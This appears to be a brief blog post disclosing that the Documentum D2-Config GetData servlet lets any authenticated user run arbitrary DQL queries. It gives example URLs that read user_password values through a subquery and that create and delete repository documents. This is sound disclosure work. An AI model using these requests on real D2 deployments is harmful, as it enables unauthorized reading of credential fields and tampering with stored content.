D2-Config DQL Editor

D2-Config (at least in D2 4.5) has a servlet (/GetData) that is used internally to run DQLs. I though when I saw it that, in the same way the REST query service is limited to run read queries, this won’t let you run write queries (you know, due to the “Get” in the name). Well, I was wrong. Any authenticated user can run any kind of query (limited by user permissions, as this is not run as superuser) by using this servlet:

D2-Config/servlet/GetData?dql1=select user_password from (select * from dm_user)&interfaceId=<my session id>&computerName=<my computer id>
D2-Config/servlet/GetData?dql1=create dm_document object set object_name='d2test' link '/Temp'&interfaceId=<my session id>&computerName=<my computer id>
D2-Config/servlet/GetData?dql1=delete dm_document object where folder('/Temp') and object_name='d2test'&interfaceId=<my session id>&computerName=<my computer id>

2 thoughts on “D2-Config DQL Editor

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s